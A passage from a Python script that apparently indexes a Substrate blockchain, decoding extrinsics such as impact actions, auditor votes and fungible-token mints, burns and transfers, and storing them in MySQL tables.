datatx=(blocknumber,txhash,signer,dtblockchain,idimpactaction,j['description'],j['category'],j['auditors'],j['blockstart'],j['blockend'],j['rewardstoken'],j['rewardsamount'],j['rewardsoracle'],j['rewardsauditors'],j['slashingsauditors'],j['maxerrorsauditor'],json.dumps(f))\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Impact Actions\ndef impactactions_destroyimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Impact Action\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id Impact Action: \",idimpactaction)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactions where id=%s\"\n datatx=(idimpactaction,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Oracle\ndef impactactions_neworacle(blocknumber,txhash,signer,currenttime,idoracle,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n j=json.loads(data)\n print(\"Storing New Oracle\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id: \",idoracle)\n print(\"Data: \",data)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsoracles set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s\"\n addtx=addtx+\",description=%s,account=%s,otherinfo=%s\"\n if 'otherinfo' in j:\n o=j['otherinfo']\n else: \n o=''\n datatx=(blocknumber,txhash,signer,dtblockchain,idoracle,j['description'],j['account'],o)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Oracle\ndef impactactions_destroyoracle(blocknumber,txhash,signer,currenttime,idoracle):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Oracle\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id Oracle: \",idoracle)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsoracles where id=%s\"\n datatx=(idoracle,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Approval Request\ndef impactactions_newapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,info):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n print(\"Storing New Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id: \",approvalrequestid)\n print(\"Info: \",info)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsapprovalrequests set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,info=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,info)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Vote Approval Request\ndef impactactions_voteapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n j=json.loads(data)\n vote=j['vote']\n otherinfo=j['otherinfo']\n print(\"Storing Vote of an Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id Approval: \",approvalrequestid)\n print(\"Vote: \",vote)\n print(\"Other Info: \",otherinfo)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsapprovalrequestauditorvotes set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,vote=%s,otherinfo=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,vote,otherinfo)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Assign Auditor to Approval Request\ndef impactactions_assignauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor,maxdays):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n print(\"Storing Assigned Auditor for an Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Approval Request Id: \",approvalrequestid)\n print(\"Auditor: \",auditor)\n print(\"Max days: \",maxdays)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsapprovalrequestsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,auditor=%s,maxdays=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,auditor,maxdays)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Auditor\ndef impactactions_destory_assignedauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Assigned Auditor to an Approval Request\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Approval Request id: \",approvalrequestid)\n print(\"Auditor: \",auditor)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsapprovalrequestsauditors where approvalrequestid=%s and auditor=%s\"\n datatx=(approvalrequestid,auditor)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Auditor\ndef impactactions_newauditor(blocknumber,txhash,signer,currenttime,account,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n j=json.loads(data)\n print(\"Storing New Auditor\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Account: \",account)\n print(\"Data: \",data)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s\"\n addtx=addtx+\",description=%s,account=%s,categories=%s,area=%s,otherinfo=%s\"\n if 'otherinfo' in j:\n o=j['otherinfo']\n else: \n o=''\n datatx=(blocknumber,txhash,signer,dtblockchain,j['description'],account,json.dumps(j['categories']),j['area'],o)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Auditor\ndef impactactions_destroyauditor(blocknumber,txhash,signer,currenttime,account):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Auditor\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"account: \",account)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsauditors where account=%s\"\n datatx=(account,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Proxy\ndef impactactions_newproxy(blocknumber,txhash,signer,currenttime,idproxy, account):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Storing New Proxy\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Account: \",account)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionsproxy set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s\"\n addtx=addtx+\",id=%s,account=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,idproxy,account)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close() \n# function to store Impact Actions - Destroy Proxy\ndef impactactions_destroyproxy(blocknumber,txhash,signer,currenttime,idproxy):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Proxy\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"id Proxy: \",idproxy)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionsproxy where id=%s\"\n datatx=(idproxy,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Category\ndef impactactions_newcategory(blocknumber,txhash,signer,currenttime,idcategory,description):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Storing New Category\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id category: \",idcategory)\n print(\"Description: \",description)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactionscategories set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,description=%s\"\n datatx=(blocknumber,txhash,signer,dtblockchain,idcategory,description)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - Destroy Category\ndef impactactions_destroycategory(blocknumber,txhash,signer,currenttime,idcategory):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Category\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id category: \",idcategory)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from impactactionscategories where id=%s\"\n datatx=(idcategory,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to create new asset from Sudo\ndef assets_force_create(blocknumber,txhash,signer,currenttime,assetid,owner,maxzombies,minbalance):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Create Asset (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Owner : \",owner)\n print(\"Max Zombies : \",maxzombies)\n print(\"Min Balance : \",minbalance)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into ftassets set blocknumber=%s,txhash=%s,signer=%s,assetid=%s,owner=%s,maxzombies=%s,minbalance=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,signer,assetid,owner,maxzombies,minbalance,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to mint assets in favor of an account\ndef assets_mint(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n category=\"Minted\"\n print(\"Mint Assets (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Recipient : \",recipient)\n print(\"Amount : \",amount)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to burn assets decrease the balance of an account\ndef assets_burn(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n category=\"Burned\"\n print(\"Burn Assets (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Recipient : \",recipient)\n print(\"Amount : \",amount)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to transfer assets in favor of an account\ndef assets_transfer(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n category=\"Transfer\"\n print(\"Mint Assets (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Recipient : \",recipient)\n print(\"Amount : \",amount)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to force transfer assets in favor of an account\ndef assets_forcetransfer(blocknumber,txhash,signer,sender,currenttime,assetid,recipient,amount):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n category=\"Transfer\"\n print(\"Mint Assets (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id : \",assetid)\n print(\"Recipient : \",recipient)\n print(\"Amount : \",amount)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to destroy asset (Fungible Tokens) from Sudo\ndef assets_force_destroy(blocknumber,txhash,signer,currenttime,assetid,witnesszombies):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Destroy Asset (Fungible Tokens)\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Asset Id: \",assetid)\n print(\"Witnesses Zombies: \",witnesszombies)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n deltx=\"delete from ftassets where assetid=%s\"\n datatx=(assetid,)\n try:\n cursor.execute(deltx,datatx)\n except mysql.connector.Error as err:\n print(\"[Error] \",err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to process a block of data\ndef process_block(blocknumber):\n # Retrieve extrinsics in block\n print(\"Processing Block # \",blocknumber)\n result = substrate.get_block(block_number=blocknumber)\n print (\"##########################\")\n print(result)\n print(\"Block Hash: \",result['header']['hash'])\n blockhash=result['header']['hash']\n print (\"##########################\")\n events=substrate.get_events(result['header']['hash'])\n print (\"#######EVENTS##############\")\n print(events)\n print (\"##########################\")\n # retrieve receipt\n cnt=0 \n for extrinsic in result['extrinsics']:\n if extrinsic.address:\n signed_by_address = extrinsic.address.value\n else:\n signed_by_address = None\n print('\\nPallet: {}\\nCall: {}\\nSigned by: {}'.format(\n extrinsic.call_module.name,\n extrinsic.call.name,\n signed_by_address\n ))\n # check for exstrinc success or not\n try:\n error=events[cnt].params[0]['value'].get('Error')\n except:\n error=None\n if events[cnt].event.name==\"ExtrinsicFailed\" or error!=None :\n print(\"Extrinsic has failed\")\n cnt=cnt+1\n continue\n else:\n print(\"Extrinsic succeded: \",events[cnt].event.name)\n print(\"extrinsic.extrinsic_hash: \",extrinsic.extrinsic_hash)\n print(\"extrinsic: \",extrinsic)\n print(\"blockhash: \",blockhash)\n gasfees=0\n if (extrinsic.extrinsic_hash!=None):\n # get receipt of the extrisinc\n receipt = ExtrinsicReceipt(\n substrate=substrate,\n extrinsic_hash=extrinsic.extrinsic_hash,\n block_hash=blockhash\n )\n print(\"************RECEIPT**************\")\n print(\"blockhash: \",blockhash)\n print(\"extrinsic.extrinsic_hash: \",extrinsic.extrinsic_hash)\n print(\"receipt.total_fee_amount: \",receipt.total_fee_amount)\n print(receipt.is_success) \n print(receipt.extrinsic.call_module.name) \n print(receipt.extrinsic.call.name) \n print(receipt.weight) \n print(\"*********************************\")\n gasfees=receipt.total_fee_amount\n #for TimeStamp call we set the time of the following transactions\n if extrinsic.call_module.name==\"Timestamp\" and extrinsic.call.name==\"set\":\n currentime=extrinsic.params[0]['value']\n #Balance Transfer we update the transactions\n if extrinsic.call_module.name==\"Balances\" and ( extrinsic.call.name==\"transfer\" or extrinsic.call.name==\"transfer_keep_alive\"):\n ## store the transaction in the database\n store_transaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,extrinsic.params[0]['value'],extrinsic.params[1]['value'],currentime,gasfees)\n #Impact Actions - Vote Approval Request\n if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"vote_approval_request\":\n impactactions_voteapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])\n #Impact Actions - Vote Approval Request\n if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"request_approval\":\n impactactions_newapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value']) \n #Impact Actions - Assign Auditor to Approval Request\n if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"assign_auditor\":\n impactactions_assignauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value']) \n #Impact Actions - Remove Assigned Auditor to Approval Request\n if extrinsic.call_module.name==\"ImpactActions\" and extrinsic.call.name==\"destroy_assigned_auditor\":\n impactactions_destory_assignedauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value']) \n #Assets - Create new asset as regular user\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"create\":\n assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'],extrinsic.params[3]['value'])\n #Assets - Destroy asset as regular user\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"destroy\":\n assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])\n #Assets - Mint assets in favor of an account\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"mint\":\n assets_mint(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])\n #Assets - Burn assets decreasing the balance of an account\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"burn\":\n assets_burn(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])\n #Assets - Transfer assets in favor of an account\n if extrinsic.call_module.name==\"Assets\" and extrinsic.call.name==\"transfer\":\n assets_transfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])\n # Sudo Calls\n if extrinsic.call_module.name==\"Sudo\" and extrinsic.call.name==\"sudo\":\n print(extrinsic.params[0].get('value'))\n c=extrinsic.params[0].get('value')\n # new impact action\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_impact_action':\n print(\"Impact Actions - Create New Impact Action\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"data: \",c['call_args'][1]['value'])\n impactactions_newimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy impact action\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_impact_action':\n print(\"Impact Actions - Destroy Impact Action\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new oracle\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_oracle':\n print(\"Impact Actions - Create New Oracle\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"data: \",c['call_args'][1]['value'])\n impactactions_neworacle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy oracle\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_oracle':\n print(\"Impact Actions - Destroy Oracle\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyoracle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new auditor\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_auditor':\n print(\"Impact Actions - Create New Auditor\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"data: \",c['call_args'][1]['value'])\n impactactions_newauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy auditor\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_auditor':\n print(\"Impact Actions - Destroy Auditor\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new proxy account\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_proxy':\n print(\"Impact Actions - Create New Proxy\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"account: \",c['call_args'][1]['value'])\n impactactions_newproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy proxy\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_proxy':\n print(\"Impact Actions - Destroy Proxy\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new category\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_category':\n print(\"Impact Actions - Create New Category\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"description: \",c['call_args'][1]['value'])\n impactactions_newcategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy category\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_category':\n print(\"Impact Actions - Destroy Category\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroycategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # Force Create Asset\n if c['call_module']== 'Assets' and c['call_function']=='force_create':\n print(\"Fungibile Tokens - Create Asset\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"Owner: \",c['call_args'][1]['value'])\n print(\"Max Zombies: \",c['call_args'][2]['value'])\n print(\"Minimum Deposit: \",c['call_args'][3]['value'])\n assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])\n # Force transfer Assets\n if c['call_module']== 'Assets' and c['call_function']=='force_transfer':\n print(\"Fungible Tokens - Force Transfer\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"Witnesses Zombies: \",c['call_args'][1]['value'])\n assets_forcetransfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,c['call_args'][1]['value'],currentime,c['call_args'][0]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])\n # Force Destroy Asset\n if c['call_module']== 'Assets' and c['call_function']=='force_destroy':\n print(\"Fungible Tokens - Create Asset\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"Witnesses Zombies: \",c['call_args'][1]['value'])\n assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n \n # Loop through call params\n for param in extrinsic.params:\n if param['type'] == 'Compact':\n param['value'] = '{} {}'.format(param['value'] / 10 ** substrate.token_decimals, substrate.token_symbol)\n print(\"Param '{}': {}\".format(param['name'], param['value']))\n cnt=cnt+1\n\n# subscription handler for new blocks written\ndef subscription_handler(obj, update_nr, subscription_id):\n print(f\"New block #{obj['header']['number']} produced by {obj['author']} hash: {obj['header']['hash']}\")\n # call the block management function\n process_block(obj['header']['number'])\n \n## MAIN \n\n# load custom data types\ncustom_type_registry = load_type_registry_file(\"../assets/types.json\")\n# define connection parameters\nsubstrate = SubstrateInterface(\n url=NODE,\n ss58_format=42,\n type_registry_preset='default',\n type_registry=custom_type_registry\n\n)\n# create database tables\ncreate_tables()\n# syncronise the blockchain\nif(len(sys.argv)>1):\n if (sys.argv[1]== '--sync' or sys.argv[1]==\"-s\"):\n sync_blockchain(substrate)\n# subscribe to new block writing and process them in real time\nresult = substrate.subscribe_block_headers(subscription_handler, include_author=True)\nprint(result)\n\n\n","sub_path":"cache-engine/bitg-blockchain-crawler.py","file_name":"bitg-blockchain-crawler.py","file_ext":"py","file_size_in_byte":49445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 